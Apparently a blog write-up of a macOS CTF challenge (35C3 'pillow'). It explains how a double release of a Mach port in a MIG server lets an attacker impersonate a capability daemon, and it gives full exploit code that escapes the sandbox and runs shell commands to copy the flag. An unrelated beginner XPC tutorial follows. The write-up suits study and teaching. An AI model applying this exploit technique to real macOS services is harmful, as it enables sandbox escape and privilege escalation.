    OutHeadP->msgh_id = InHeadP->msgh_id + 100;
    OutHeadP->msgh_reserved = 0;
    // Validate msgh_id; if it is valid, store the matching MIG routine in the routine function pointer
    if ((InHeadP->msgh_id > 133703) || (InHeadP->msgh_id < 133700) ||
        ((routine = shelld_subsystem.routine[InHeadP->msgh_id - 133700].stub_routine) == 0)) {
        ((mig_reply_error_t *)OutHeadP)->NDR = NDR_record;
        ((mig_reply_error_t *)OutHeadP)->RetCode = MIG_BAD_ID;
        return FALSE;
    }
    // Finally, call the MIG routine
    (*routine) (InHeadP, OutHeadP);
    return TRUE;
}

Note that as long as MIG is working normally, shelld_server always returns TRUE.

We can also see that the message returned to the client is not COMPLEX.

Note that msgh_bits of OutHeadP is set without the COMPLEX flag.
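The dispatch step can be modeled in a few lines of portable C. This is a toy demultiplexer, not the MIG-generated code: the toy_* names and the routines' fixed return values are invented for illustration, and the constants are the numeric values of KERN_FAILURE and MIG_BAD_ID copied in by hand so that the sketch compiles without the Mach headers.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define SUBSYSTEM_BASE    133700  /* "subsystem shelld 133700" in shelld.defs */
#define ROUTINE_COUNT     4
#define TOY_KERN_SUCCESS  0
#define TOY_KERN_FAILURE  5       /* numeric value of KERN_FAILURE */
#define TOY_MIG_BAD_ID    (-303)  /* numeric value of MIG_BAD_ID */

typedef int (*toy_routine_t)(void);

/* Placeholder routines, in the order they are declared in shelld.defs. */
static int toy_create_session(void) { return TOY_KERN_SUCCESS; }
static int toy_shell_exec(void)     { return TOY_KERN_SUCCESS; }
static int toy_register(void)       { return TOY_KERN_FAILURE; } /* e.g. unknown session */
static int toy_unregister(void)     { return TOY_KERN_SUCCESS; }

static const toy_routine_t toy_routines[ROUTINE_COUNT] = {
    toy_create_session, toy_shell_exec, toy_register, toy_unregister,
};

/* Returns false only for an unknown msgh_id. A routine that fails still
 * yields true; its error travels in *ret_code (RetCode in the reply). */
bool toy_demux(int msgh_id, int *ret_code) {
    assert(ret_code != NULL);
    if (msgh_id < SUBSYSTEM_BASE || msgh_id >= SUBSYSTEM_BASE + ROUTINE_COUNT) {
        *ret_code = TOY_MIG_BAD_ID;
        return false;
    }
    *ret_code = toy_routines[msgh_id - SUBSYSTEM_BASE]();
    return true;
}
```

The distinction between "demux failed" and "routine returned an error" matters later, because the caller of the demux function treats the two cases in separate branches.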

2) _Xregister_completion_listener

When a client calls register_completion_listener, shelld_server invokes the corresponding routine, _Xregister_completion_listener.

/* Routine register_completion_listener */
mig_internal novalue _Xregister_completion_listener
    (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
{
[...]
    typedef struct {
        mach_msg_header_t Head;
        /* start of the kernel processed data */
        mach_msg_body_t msgh_body;
        mach_msg_port_descriptor_t listener;
        /* end of the kernel processed data */
        NDR_record_t NDR;
        mach_msg_type_number_t sessionOffset; /* MiG doesn't use it */
        mach_msg_type_number_t sessionCnt;
        char session[4096];
        mach_msg_max_trailer_t trailer;
    } Request __attribute__((unused));
[...]
    typedef __Request__register_completion_listener_t __Request;
    typedef __Reply__register_completion_listener_t Reply __attribute__((unused));


    Request *In0P = (Request *) InHeadP;
    Reply *OutP = (Reply *) OutHeadP;
    mach_msg_max_trailer_t *TrailerP;
[...]
    OutP->RetCode = register_completion_listener(In0P->Head.msgh_request_port, In0P->session, In0P->listener.name, TrailerP->msgh_audit);
    
[...]
}

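As shown, a client passes a Mach port to the server through a mach_msg_port_descriptor_t. Further down, the routine calls the interface that the server actually implements and stores its return value (a KERN_* code) in the RetCode field.

Below is the reply Mach message structure; RetCode is one of the few values that propagate upward: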

typedef struct {
    mach_msg_header_t Head;
    NDR_record_t NDR;
    kern_return_t RetCode;
} __Reply__unregister_completion_listener_t __attribute__((unused));

So where is RetCode used? In other words, does the KERN_* value returned by the server's implementation affect the lifetime of the listener Mach port that the server received?

It does.

3) libdispatch

Let's look at how libdispatch handles Mach messages sent by the client.

shelld tells libdispatch to call dispatch_mig_server to handle Mach messages:

dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, 0, dispatch_get_main_queue());

dispatch_source_set_event_handler(source, ^{
    dispatch_mig_server(source, MAX_MSG_SIZE, shelld_server);
});

dispatch_resume(source);
dispatch_main();

So let's take a brief look at dispatch_mig_server. Below is the core of its source, abridged and heavily annotated:

The libdispatch source is available from apple opensource libdispatch src.

mach_msg_return_t
dispatch_mig_server(dispatch_source_t ds, size_t maxmsgsz,
        dispatch_mig_callback_t callback)
{
    [...]
    uint32_t cnt = 1000; // do not stall out serial queues
    boolean_t demux_success;
    bool received = false;
    [...]

    tmp_options = options;
    // XXX FIXME -- change this to not starve out the target queue
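    // Loop, handling at most cnt messages from the port
    for (;;) {
        // If the source has been suspended, or the loop has already run cnt times
        if (DISPATCH_QUEUE_IS_SUSPENDED(ds) || (--cnt == 0)) {
            // then stop receiving Mach messages for the rest of this call
            options &= ~MACH_RCV_MSG;
            tmp_options &= ~MACH_RCV_MSG;
            // If there is also no pending reply to send, return immediately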
            if (!(tmp_options & MACH_SEND_MSG)) {
                goto out;
            }
        }
        // mach_msg may receive and/or send here: the first iteration only receives, later iterations send the previous reply while receiving the next request, and so on
        kr = mach_msg(&bufReply->Head, tmp_options, bufReply->Head.msgh_size,
                (mach_msg_size_t)rcv_size, (mach_port_t)dr->du_ident, 0, 0);
        // Reset the temporary options
        tmp_options = options;
        // mach_msg error handling; not relevant here
        if (unlikely(kr)) {
            [...]
            goto out;
        }
        // If no further message is to be received, return
        if (!(tmp_options & MACH_RCV_MSG)) {
            goto out;
        }

        [...]
        // Reaching this point means this iteration received a Mach message (whether a reply was sent in the same call does not matter here)
        received = true;

        // Swap bufRequest and bufReply
        bufTemp = bufRequest;
        bufRequest = bufReply;
        bufReply = bufTemp;
        // The received Mach message is now in bufRequest

        [...]
        
        _voucher_replace(voucher_create_with_mach_msg(&bufRequest->Head));
        bufReply->Head = (mach_msg_header_t){ };
        // Pass the received message to callback, the MIG handler routine supplied by the caller of dispatch_mig_server
        // In shelld, this callback is shelld_server
        demux_success = callback(&bufRequest->Head, &bufReply->Head);

        // If the msgh_id of the incoming MIG message is invalid, the callback fails
        if (!demux_success) {
            // destroy the request - but not the reply port
            bufRequest->Head.msgh_remote_port = 0;
            mach_msg_destroy(&bufRequest->Head);
        // If the callback succeeded and the reply is not a complex message
        } else if (!(bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
            // if MACH_MSGH_BITS_COMPLEX is _not_ set, then bufReply->RetCode
            // is present
            // If the server's interface failed, i.e. it returned something other than KERN_SUCCESS
            if (unlikely(bufReply->RetCode)) {
                [...]

                // destroy the request - but not the reply port
                bufRequest->Head.msgh_remote_port = 0;
                // the received Mach message is destroyed
                mach_msg_destroy(&bufRequest->Head);
            }
        }
        // If a reply is needed, set the SEND flag; the next loop iteration then calls mach_msg(RCV|SEND)
        if (bufReply->Head.msgh_remote_port) {
            tmp_options |= MACH_SEND_MSG;
            if (MACH_MSGH_BITS_REMOTE(bufReply->Head.msgh_bits) !=
                    MACH_MSG_TYPE_MOVE_SEND_ONCE) {
                tmp_options |= MACH_SEND_TIMEOUT;
            }
        }
    }
    [...]

    return kr;
}

Note this fragment:

// In shelld, this callback is shelld_server
demux_success = callback(&bufRequest->Head, &bufReply->Head);

// If the msgh_id of the incoming MIG message is invalid, the callback fails
if (!demux_success) {
    [...]
// If the callback succeeded and the reply is not a complex message
} else if (!(bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
    // if MACH_MSGH_BITS_COMPLEX is _not_ set, then bufReply->RetCode
    // is present
    // If the server's interface failed, i.e. it returned something other than KERN_SUCCESS
    if (unlikely(bufReply->RetCode)) {
        [...]

        // destroy the request - but not the reply port
        bufRequest->Head.msgh_remote_port = 0;
        // the received Mach message is destroyed
        mach_msg_destroy(&bufRequest->Head);
    }
}

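Here callback is the shelld_server that shelld registered, which almost never returns FALSE, and the reply Mach message is not COMPLEX. So the first if does not hold and execution enters the second branch (the else if).

In that branch, dispatch_mig_server examines the call result RetCode: if the call failed, it calls mach_msg_destroy to destroy the request message.

In the implementation of mach_msg_destroy in the XNU source, note that it destroys every MACH_MSG_PORT_DESCRIPTOR in the message passed in, and that is where the listener Mach port sent by the client is stored: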

void
mach_msg_destroy(mach_msg_header_t *msg)
{
    mach_msg_bits_t mbits = msg->msgh_bits;

    /*
     * The msgh_local_port field doesn't hold a port right.
     * The receive operation consumes the destination port right.
     */

    mach_msg_destroy_port(msg->msgh_remote_port, MACH_MSGH_BITS_REMOTE(mbits));
    mach_msg_destroy_port(msg->msgh_voucher_port, MACH_MSGH_BITS_VOUCHER(mbits));

    if (mbits & MACH_MSGH_BITS_COMPLEX) {
        mach_msg_base_t         *base;
        mach_msg_type_number_t  count, i;
        mach_msg_descriptor_t   *daddr;

        base = (mach_msg_base_t *) msg;
        count = base->body.msgh_descriptor_count;

        daddr = (mach_msg_descriptor_t *) (base + 1);
        for (i = 0; i < count; i++) {
            switch (daddr->type.type) {
                case MACH_MSG_PORT_DESCRIPTOR: {
                    // If a descriptor in the message is of type PORT, call mach_msg_destroy_port to release it
                    mach_msg_port_descriptor_t *dsc;

                    /* 
                     * Destroy port rights carried in the message 
                     */
                    dsc = &daddr->port;
                    // mach_msg_destroy_port then calls mach_port_deallocate to release the port
                    mach_msg_destroy_port(dsc->name, dsc->disposition);
                    daddr = (mach_msg_descriptor_t *)(dsc + 1);
                    break;
                }
                [...]
            }
        }
    }
}

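This means that when the interface implemented by the server does not return KERN_SUCCESS, libdispatch automatically releases the listener (Mach port) that the client passed to the server.

In other words: if a MIG call returns a success code, the method has taken ownership of all Mach port rights contained in the message; if it returns a failure code, the method owns none of the Mach port rights in the message, and they are silently destroyed by the MIG runtime.

4) mach_msg_server*

Besides libdispatch, the other server loops used with MIG, mach_msg_server and mach_msg_server_once, follow the same rule: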

mach_msg_return_t
mach_msg_server(
    boolean_t (*demux)(mach_msg_header_t *, mach_msg_header_t *),
    mach_msg_size_t max_size,
    mach_port_t rcv_name,
    mach_msg_options_t options)
{
    [...]

    for (;;) {
        [...]

        // Receive the incoming message
        mr = mach_msg(&bufRequest->Head, MACH_RCV_MSG|MACH_RCV_VOUCHER|options,
                  0, request_size, rcv_name,
                  MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

        while (mr == MACH_MSG_SUCCESS) {
            /* we have another request message */

            buffers_swapped = FALSE;
            old_state = voucher_mach_msg_adopt(&bufRequest->Head);

            // Call the MIG server
            (void) (*demux)(&bufRequest->Head, &bufReply->Head);
            
            // If the reply Mach message is not COMPLEX
            if (!(bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
                if (bufReply->RetCode == MIG_NO_REPLY)
                    bufReply->Head.msgh_remote_port = MACH_PORT_NULL;
                // and the MIG call failed while the client's request is COMPLEX
                else if ((bufReply->RetCode != KERN_SUCCESS) &&
                     (bufRequest->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
                    /* destroy the request - but not the reply port */
                    bufRequest->Head.msgh_remote_port = MACH_PORT_NULL;
                    // call mach_msg_destroy to destroy it
                    mach_msg_destroy(&bufRequest->Head);
                }
            }

            [...]

        } /* while (mr == MACH_MSG_SUCCESS) */

        [...]

        break;

    } /* for(;;) */

    (void)vm_deallocate(self,
                (vm_address_t) bufRequest,
                request_alloc);
    (void)vm_deallocate(self,
                (vm_address_t) bufReply,
                reply_alloc);
    return mr;
}

c. The problem

Now back to register_completion_listener. Let's see what is wrong with it:

kern_return_t register_completion_listener(mach_port_t server, const char* session_name, mach_port_t listener, audit_token_t client) {
    CFMutableDictionaryRef session = lookup_session(session_name, client);
    if (!session) {
        mach_port_deallocate(mach_task_self(), listener);
        return KERN_FAILURE;
    }

    CFNumberRef value = CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &listener);
    CFDictionaryAddValue(session, CFSTR("listener"), value);
    CFRelease(value);

    return KERN_SUCCESS;
}

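Clearly, since the function returns KERN_FAILURE when the session cannot be found, it should not deallocate the listener Mach port itself. Doing so deallocates the port twice: once in this function, and once more in the MIG processing that follows.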
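The double release can be reproduced in a portable toy model. Nothing here touches real Mach ports: struct toy_right, toy_dispatch, and the two handlers are hypothetical stand-ins, with toy_dispatch playing the role of the failure branch in dispatch_mig_server and fixed_handler showing one way the handler could respect the ownership rule.

```c
#include <assert.h>
#include <stddef.h>

#define TOY_SUCCESS 0
#define TOY_FAILURE 5   /* numeric value of KERN_FAILURE */

/* A send right as seen by one task: just a user-reference count. */
struct toy_right { int urefs; };

static void toy_deallocate(struct toy_right *r) {
    assert(r != NULL);
    if (r->urefs > 0)
        r->urefs--;
}

typedef int (*toy_handler_t)(struct toy_right *listener, int session_exists);

/* Buggy: like register_completion_listener, it releases the right AND fails. */
int buggy_handler(struct toy_right *listener, int session_exists) {
    if (!session_exists) {
        toy_deallocate(listener);
        return TOY_FAILURE;
    }
    return TOY_SUCCESS;             /* success: the handler keeps the right */
}

/* Fixed: on failure, leave the cleanup to the dispatcher. */
int fixed_handler(struct toy_right *listener, int session_exists) {
    (void)listener;
    return session_exists ? TOY_SUCCESS : TOY_FAILURE;
}

/* Stand-in for the server loop: a failing handler owns nothing, so the
 * rights carried by the request are destroyed here. */
int toy_dispatch(toy_handler_t handler, struct toy_right *listener, int session_exists) {
    int ret = handler(listener, session_exists);
    if (ret != TOY_SUCCESS)
        toy_deallocate(listener);   /* models mach_msg_destroy on the request */
    return ret;
}
```

Starting from two references, one failing call through buggy_handler leaves zero, whereas fixed_handler leaves one.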

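d. Taking over capsd_service_port

From the above, register_completion_listener can cause a double deallocation of a Mach port.

Because Mach port rights are reference counted, we can pass capsd_service_port to this function and use the bug to release capsd_service_port twice. At that point the reference count of capsd_service_port is 2, so the double release drops it to 0 and the Mach port name is freed completely in shelld's task. The name can then be reused by the next Mach port that is created.

In shelld, the reference count of capsd_service_port is 2 while register_completion_listener(..., capsd_service_port) runs because:
shelld already obtained one right to capsd_service_port when main called bootstrap_look_up.
When register_completion_listener is called, the client sends capsd_service_port to the server once more.
The server therefore holds the same port from two different places, giving a reference count of 2.

We can thus try to hijack the freed Mach port name and pose as a fake "capsd" to shelld, returning a forged result when shelld queries for capabilities and bypassing the sandbox capability check.

It took some time to write the exploit. The following code gets past shelld's sandbox capabilities check: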

#include 
#include 

#include "../mig/shelld.h"
#include "../common/utils.h"
#include "../common/decls.h"

// Functions required to impersonate capsd
boolean_t capsd_server
    (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP);

kern_return_t grant_capability(mach_port_t server, audit_token_t token, pid_t target, const char* op, const char* arg) {
    return KERN_SUCCESS;
}

kern_return_t has_capability(mach_port_t server, pid_t pid, const char* op, const char* arg, int* out) {
    *out = 1;
    return KERN_SUCCESS;
}

int main(int argc, char* argv[]) {
    // Get the bootstrap port, the shelld port, and the capsd port
    mach_port_t bp, sp, cp;
    task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bp);
    kern_return_t kr = bootstrap_look_up(bp, "net.saelo.shelld", &sp);
    ASSERT_SUCCESS(kr, "shelld bootstrap_look_up");
    kr = bootstrap_look_up(bp, "net.saelo.capsd", &cp);
    ASSERT_SUCCESS(kr, "capsd bootstrap_look_up");

    // Prepare a usable session in advance
    shelld_create_session(sp, "session");

    // Quick test: this cannot pass the capability check, because the exploit has no permission to launch /bin/bash
    kr = shell_exec(sp, "session", "echo 'Hello World'");
    if(kr != KERN_SUCCESS)
        printf("[*] shell_exec failed before attack.\n");

    // Try to release capsd_service_port inside shelld
    register_completion_listener(sp, "non-exist-session", cp);

    // Create a new listener and listener_send_right
    mach_port_t listener, listener_send_right;
    mach_msg_type_name_t aquired_right;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &listener);
    mach_port_extract_right(mach_task_self(), listener, MACH_MSG_TYPE_MAKE_SEND, &listener_send_right, &aquired_right);

    /* Start a fake capsd server.
       Note that a new dispatch queue must be created for the listener:
       the main queue only runs once dispatch_main is called, but we still need the control flow here, so dispatch_main cannot be called */
    dispatch_queue_t replyQueue = dispatch_queue_create("replyQueue", NULL);
    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, 0, replyQueue);
    dispatch_source_set_event_handler(source, ^{
        dispatch_mig_server(source, MAX_MSG_SIZE, capsd_server);
    });
    dispatch_resume(source);

    // 尝试绕过 sandbox capabilities check
    for(size_t cnt = 0; cnt < 10000; ++cnt) {
        register_completion_listener(sp, "session", listener_send_right);
        // 测试基本功能
        kr = shell_exec(sp, "session", "echo 'Hello World'");
        if(kr == KERN_SUCCESS) {
            printf("[+] shell_exec success! test %zu times.\n", cnt);
            break;
        }
        // 如果无法使用，则将该 listener 从 shelld 中删除
        unregister_completion_listener(sp, "session");
    }

    exit(EXIT_FAILURE);
}

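The result is shown below; the capabilities check is passed successfully:

Note that when debugging it is best to restart shelld every time, so that stale internal state does not interfere.

V. Exploitation

Putting the pieces above together, we can finally assemble a complete exploit: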

#include 
#include 

#include "../mig/shelld.h"
#include "../common/utils.h"
#include "../common/decls.h"

// Functions required to impersonate capsd
boolean_t capsd_server
    (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP);

kern_return_t grant_capability(mach_port_t server, audit_token_t token, pid_t target, const char* op, const char* arg) {
    return KERN_SUCCESS;
}

kern_return_t has_capability(mach_port_t server, pid_t pid, const char* op, const char* arg, int* out) {
    *out = 1;
    return KERN_SUCCESS;
}

int main(int argc, char* argv[]) {
    // Obtain the bootstrap port, the shelld port and the capsd port
    mach_port_t bp, sp, cp;
    task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bp);
    kern_return_t kr = bootstrap_look_up(bp, "net.saelo.shelld", &sp);
    ASSERT_SUCCESS(kr, "shelld bootstrap_look_up");
    kr = bootstrap_look_up(bp, "net.saelo.capsd", &cp);
    ASSERT_SUCCESS(kr, "capsd bootstrap_look_up");

    // Prepare a usable session in advance (with a very long name)
    char long_session_name[4096];
    memset(long_session_name, 'a', sizeof(long_session_name) - 1);
    long_session_name[sizeof(long_session_name) -1] = 0;
    shelld_create_session(sp, long_session_name);

    // Try to make shelld release its capsd_service_port
    register_completion_listener(sp, "non-exist-session", cp);

    // Create a new listener (receive right) and a matching listener_send_right
    mach_port_t listener, listener_send_right;
    mach_msg_type_name_t acquired_right;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &listener);
    mach_port_extract_right(mach_task_self(), listener, MACH_MSG_TYPE_MAKE_SEND, &listener_send_right, &acquired_right);

    /* Start a fake capsd_server.
       Note that a new dispatch queue must be created for the listener:
       the main queue only runs once dispatch_main is called, but we still need
       the control flow here, so dispatch_main cannot be called. */
    dispatch_queue_t replyQueue = dispatch_queue_create("replyQueue", NULL);
    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, 0, replyQueue);
    dispatch_source_set_event_handler(source, ^{
        dispatch_mig_server(source, MAX_MSG_SIZE, capsd_server);
    });
    dispatch_resume(source);

    // Try to bypass the sandbox capabilities check
    for(size_t cnt = 0; cnt < 10000; ++cnt) {
        register_completion_listener(sp, long_session_name, listener_send_right);
        // Run the actual payload
        const char *payload = 
            "chmod 777 /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag "
            "&& cp /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag /tmp/pillow_flag "
            "&& open -a TextEdit /tmp/pillow_flag";
        kr = shell_exec(sp, long_session_name, payload);
        if(kr == KERN_SUCCESS) {
            printf("[+] shell_exec success! test %zu times.\n", cnt);

            exit(EXIT_SUCCESS);
        }
        // If it did not work, remove this listener from shelld and retry
        unregister_completion_listener(sp, long_session_name);
    }

    exit(EXIT_FAILURE);
}

Build rules (Makefile):

CC = clang
myexploit: myexploit.c
	$(CC) -g -O0 myexploit.c ../mig/shelldUser.c ../mig/capsdServer.c  -o myexploit

Running the exploit inside the sandbox:

#!/bin/bash
make
sandbox-exec -f exploit.sb -D EXPLOIT_BIN=/Users/kiprey/Desktop/CTF/35c3ctf/pillow/exploit/myexploit ./myexploit

Result:

When debugging the exp, it is best to restart shelld before every run.

VI. References

Getting Started with MacOSX XPC

2022-01-03T16:00:00.000Z

I. Introduction

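XPC is an OS X inter-process communication technology that complements the App Sandbox through privilege separation. Privilege separation splits an application into several parts according to the system resources each part needs, and each part runs with the entitlements (sandbox) it declared in advance. Each such component is called an XPC service.
Splitting an application into parts also improves reliability: a crash in one part of the code no longer brings down the whole program.
Each XPC service lives in its own sandbox, i.e. it has its own container and its own set of entitlements. An XPC service bundled inside an application can only be accessed by that application. When the application launches, the system automatically registers every XPC service it finds into a namespace visible to the application, after which the application can communicate with the service and issue requests.
In short, XPC services provide privilege separation plus fault isolation.
XPC services are managed by launchd: when a service terminates unexpectedly (or crashes), launchd restarts it.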

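II. Getting Started with XPC Services

Most examples online are written in Objective-C and few use the C API, so this post also uses Objective-C to learn XPC.
Even though I have not really learned Objective-C yet…

1. Creating the project

Open Xcode, create a new project and choose XPC Service.

Then enter the Product Name and the Organization Identifier; the resulting Bundle Identifier is a string in reverse-DNS format. This Bundle ID matters a lot and is best set to a subdomain of the application, but we can ignore that for now.

Xcode then generates sample XPC code that behaves like an echo server.

Next we will go through this sample code step by step and pick up some Objective-C along the way.

If you are not familiar with Objective-C, read along with Objective-C 基础知识 - 菜鸟教程 (the Objective-C basics tutorial on Runoob).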

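2. A simple Service example

a. protocol

Before XPC can be used, an interface must be declared. The interface mainly consists of a protocol, which describes the methods that may be invoked in the remote process.

Below is the protocol declaration generated by Xcode. It declares a protocol named XPCDemoProtocol with a single interface method, upperCaseString:

To me a protocol feels a bit like an abstract class in C++: it implements nothing and merely declares method interfaces.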

// XPCDemoProtocol.h

#import <Foundation/Foundation.h>

// The protocol that this service will vend as its API. This header file will also need to be visible to the process hosting the service.
@protocol XPCDemoProtocol

// Replace the API of this protocol with an API appropriate to the service you are vending.
- (void)upperCaseString:(NSString *)aString withReply:(void (^)(NSString *))reply;
    
@end

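A protocol constrains the programming interface between the calling program and the XPC service: every method the caller needs to invoke must be declared in the protocol. Note that XPC communication is asynchronous, so protocol methods can only return void; to return data, use a reply block, as in the second parameter of upperCaseString above, which works like a callback. (What is a block?)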
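The "void method plus reply callback" shape can be sketched in plain C. This is only an analogy under stated assumptions: `toy_upper_case_string`, `toy_reply_fn` and `toy_store_reply` are hypothetical names, a function pointer stands in for the Objective-C block, and the reply is invoked synchronously here, whereas a real XPC reply arrives asynchronously from another process.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Stand-in for the reply block: receives the result plus caller context. */
typedef void (*toy_reply_fn)(const char *result, void *ctx);

/* Returns void, like a protocol method; the result travels through `reply`.
   Input longer than 63 characters is truncated in this sketch. */
void toy_upper_case_string(const char *in, toy_reply_fn reply, void *ctx) {
    char buf[64];
    size_t i = 0;
    for (; in[i] != '\0' && i < sizeof(buf) - 1; i++)
        buf[i] = (char)toupper((unsigned char)in[i]);
    buf[i] = '\0';
    reply(buf, ctx);
}

/* Example reply handler: copies the result into a caller-provided buffer.
   `ctx` must point to at least 64 writable bytes. */
void toy_store_reply(const char *result, void *ctx) {
    char *dst = (char *)ctx;
    size_t n = strlen(result);
    if (n > 63) n = 63;
    memcpy(dst, result, n);
    dst[n] = '\0';
}
```

A caller would pass a buffer as `ctx`, for example `toy_upper_case_string("hello", toy_store_reply, out)`, and read the result from `out` once the handler has run.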

b. interface

After declaring the protocol we need a class that implements it. The code below declares the XPCDemo class, which conforms to the protocol:

//  XPCDemo.h

#import <Foundation/Foundation.h>
#import "XPCDemoProtocol.h"

// This object implements the protocol which we have defined. It provides the actual behavior for the service. It is 'exported' by the service to make it available to the process hosting the service over an NSXPCConnection.
@interface XPCDemo : NSObject <XPCDemoProtocol>
@end

and implements the class:

//  XPCDemo.m

#import "XPCDemo.h"

@implementation XPCDemo

// This implements the example protocol. Replace the body of this class with the implementation of this service's protocol.
- (void)upperCaseString:(NSString *)aString withReply:(void (^)(NSString *))reply {
    NSString *response = [aString uppercaseString];
    reply(response);
}

@end

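The code above does two things:

Define a protocol, i.e. the method interface that a remote process may call.
Create a class that conforms to the protocol and implements those methods.

The upperCaseString method does just one thing: it converts the incoming string to upper case and calls the callback to return the result.

c. NSXPCListener

That was easy enough, so let's move on to the main file.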

int main(int argc, const char *argv[])
{
    // Create the delegate for the service.
    ServiceDelegate *delegate = [ServiceDelegate new];
    
    // Set up the one NSXPCListener for this service. It will handle all incoming connections.
    NSXPCListener *listener = [NSXPCListener serviceListener];
    listener.delegate = delegate;
    
    // Resuming the serviceListener starts this service. This method does not return.
    [listener resume];
    return 0;
}

The main function obtains an NSXPCListener, sets the listener's delegate, and then calls resume.

That alone is not very illuminating, so I looked up the declaration of NSXPCListener:

// Each NSXPCListener instance has a private serial queue. This queue is used when sending the delegate messages.
API_AVAILABLE(macos(10.8), ios(6.0), watchos(2.0), tvos(9.0))
@interface NSXPCListener : NSObject

// If your listener is an XPCService (that is, in the XPCServices folder of an application or framework), then use this method to get the shared, singleton NSXPCListener object that will await new connections. When the resume method is called on this listener, it will not return. Instead it hands over control to the object and allows it to service the listener as appropriate. This makes it ideal for use in your main() function. For more info on XPCServices, please refer to the developer documentation.
+ (NSXPCListener *)serviceListener;

[...]

// The delegate for the connection listener. If no delegate is set, all new connections will be rejected. See the protocol for more information on how to implement it.
@property (nullable, weak) id <NSXPCListenerDelegate> delegate;

[...]

// All listeners start suspended and must be resumed before they will process incoming requests. If called on the serviceListener, this method will never return. Call it as the last step inside your main function in your XPC service after setting up desired initial state and the listener itself. If called on any other NSXPCListener, the connection is resumed and the method returns immediately.
- (void)resume;

// Suspend the listener. Suspends must be balanced with resumes before the listener may be invalidated.
- (void)suspend;

// Invalidate the listener. No more connections will be created. Once a listener is invalidated it may not be resumed or suspended.
- (void)invalidate;

@end

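As we can see:

For an XPC service, the serviceListener class method returns the listener that the service uses to await XPC connections.
When a new XPC connection arrives, it is handled through the delegate that was set.
After the XPC service starts and finishes its initialization, it calls resume on the listener to begin serving; this call never returns.

d. NSXPCListenerDelegate

With main mostly understood, let's look at NSXPCListenerDelegate. Here is its protocol declaration: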

@protocol NSXPCListenerDelegate <NSObject>
@optional
// Accept or reject a new connection to the listener. This is a good time to set up properties on the new connection, like its exported object and interfaces. If a value of NO is returned, the connection object will be invalidated after this method returns. Be sure to resume the new connection and return YES when you are finished configuring it and are ready to receive messages. You may delay resuming the connection if you wish, but still return YES from this method if you want the connection to be accepted.
- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection;

@end

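The protocol declares one optional method, listener:shouldAcceptNewConnection:. Its parameters are:

listener: an NSXPCListener *, the listener that received the connection
newConnection: an NSXPCConnection *, the newly incoming connection

The return value is a BOOL, either YES or NO.

Objective-C code can also use two other boolean types: bool (true, false) and Boolean (TRUE, FALSE).

This method is called to configure a new connection, much like a pre-processing step. It can accept or reject the incoming connection, and it is free to decide when to resume it. Let's look at what the generated default implementation does: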

//  main.m

#import <Foundation/Foundation.h>
#import "XPCDemo.h"

@interface ServiceDelegate : NSObject <NSXPCListenerDelegate>
@end

@implementation ServiceDelegate

- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection {
    // This method is where the NSXPCListener configures, accepts, and resumes a new incoming NSXPCConnection.
    
    // Configure the connection.
    // First, set the interface that the exported object implements.
    newConnection.exportedInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCDemoProtocol)];
    
    // Next, set the object that the connection exports. All messages sent on the connection to this service will be sent to the exported object to handle. The connection retains the exported object.
    XPCDemo *exportedObject = [XPCDemo new];
    newConnection.exportedObject = exportedObject;
    
    // Resuming the connection allows the system to deliver more incoming messages.
    [newConnection resume];
    
    // Returning YES from this method tells the system that you have accepted this connection. If you want to reject the connection for some reason, call -invalidate on the connection and return NO.
    return YES;
}

@end

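For every new connection this method sets exportedInterface and exportedObject and then resumes the connection; in other words, it fills in these two members of the incoming connection before any message is handled.

To see what this setup is for, we need to look at the declaration of NSXPCConnection. An excerpt: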

// This object is the main configuration mechanism for the communication between two processes. Each NSXPCConnection instance has a private serial queue. This queue is used when sending messages to reply handlers, interruption handlers, and invalidation handlers.
API_AVAILABLE(macos(10.8), ios(6.0), watchos(2.0), tvos(9.0))
@interface NSXPCConnection : NSObject <NSXPCProxyCreating>

[...]

// The interface that describes messages that are allowed to be received by the exported object on this connection. This value is required if a exported object is set.
@property (nullable, retain) NSXPCInterface *exportedInterface;

// Set an exported object for the connection. Messages sent to the remoteObjectProxy from the other side of the connection will be dispatched to this object. Messages delivered to exported objects are serialized and sent on a non-main queue. The receiver is responsible for handling the messages on a different queue or thread if it is required.
@property (nullable, retain) id exportedObject;

[...]

// All connections start suspended. You must resume them before they will start processing received messages or sending messages through the remoteObjectProxy. Note: Calling resume does not immediately launch the XPC service. The service will be started on demand when the first message is sent. However, if the name specified when creating the connection is determined to be invalid, your invalidation handler will be called immediately (and asynchronously) after calling resume.
- (void)resume;

[...]

@end

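In other words, the method specifies how each new connection is to be served:

exportedInterface: describes the methods that are made available to the other end of the connection.
exportedObject: a local object that handles method calls coming from the other end of the connection.

When the application calls a method on the proxy obtained from its NSXPCConnection, the call is forwarded over the connection and the target method is invoked on the object stored in exportedObject on the service side, which is how the remote procedure call is realised.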

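e. Info.plist

Info.plist plays an important role in an XPC service, which must specify a few special key-value pairs in it. Some of them:

CFBundleIdentifier: the service name of the XPC service, a reverse-DNS style string. Applications use this Bundle ID to reach the XPC service.
Remember the Bundle ID specified when creating the XPC service project? :)
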